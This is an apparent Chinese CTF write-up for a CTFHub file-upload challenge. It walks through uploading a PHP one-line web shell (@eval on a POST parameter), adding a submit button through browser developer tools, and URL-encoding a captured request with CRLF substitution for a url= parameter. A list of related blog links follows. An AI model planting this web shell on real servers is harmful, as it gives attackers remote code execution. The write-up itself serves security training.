CTFHub-上传文件

打开网址

新建一个文档,在其中写下面的内容,将名字该为1.php

<?php @eval($_POST[cmd]);?>

将1.php提交上去,发现没反应

按f12查看后发现没有提交的代码,右键编辑,自己写一个

<input type="submit" name="submit">

编辑代码后结果如下

将1.php提交查询抓包

修改一下

进行url编码

在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A

再次url编码

将结果放到url=后面

将前两个%253A换成:

相关推荐
码农12138号3 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
Johny_Zhao3 小时前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维
程序视点6 小时前
Window 10文件拷贝总是卡很久?快来试试这款小工具,榨干硬盘速度!
windows
wuk9987 小时前
基于MATLAB编制的锂离子电池伪二维模型
linux·windows·github
哲科软件7 小时前
跨平台开发的抉择:Flutter vs 原生安卓(Kotlin)的优劣对比与选型建议
android·flutter·kotlin
lzb_kkk8 小时前
【C++】C++四种类型转换操作符详解
开发语言·c++·windows·1024程序员节
独行soc9 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
万千思绪10 小时前
【PyCharm 2025.1.2配置debug】
ide·python·pycharm
Whoisshutiao11 小时前
网安-XSS-pikachu
前端·安全·网络安全
jyan_敬言13 小时前
【C++】string类(二)相关接口介绍及其使用
android·开发语言·c++·青少年编程·visual studio